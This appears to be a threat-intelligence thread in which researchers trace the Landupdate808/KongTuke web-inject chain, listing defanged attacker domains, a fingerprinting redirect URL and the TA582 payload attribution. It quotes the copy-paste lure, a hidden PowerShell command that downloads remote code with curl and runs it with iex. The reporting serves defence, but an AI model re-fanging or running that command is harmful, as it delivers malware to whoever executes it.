JacobLikely next #Landupdate808 / #Kongtuke infra:
rshank[.]com
Still was never able to get a payload from the last reported infra, vicrin[.]com
Well, I figured it out, thanks to some help by @rmceoin
Victim site
-->
rshank[.]com/metrics.js (Landupdate808 infra)
-->
cloudflare[.]com/cdn-cgi/trace (fingerprinting checks)
-->
hxxps[:]//rshank[.]com/js.php?device=[OS]&ip=[IP INFO]=&refferer=[REFERRER URL]=&browser=[BROWSER]&ua=[USER AGENT]&domain=[KONGTUKE INFRA]&loc=[COUNTRY CODE]=&is_ajax=1
Ctrl+C then copies
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//527newagain[.]top/1.php?s=527;iex $global:block.content
Not able to get the payload off of the curl command though, not sure if it's live.
cc @MalasadaTech figured you might be interested, this is a new tactic for them
Dusty@cyberamateur @rmceoin @MalasadaTech the payload is ta582, same thing that drops from SG non-domain joined chain
Randy@GustyDusty @cyberamateur @MalasadaTech oh! I felt like the whole
blahblah.top /1.php ? s= format seemed familiar.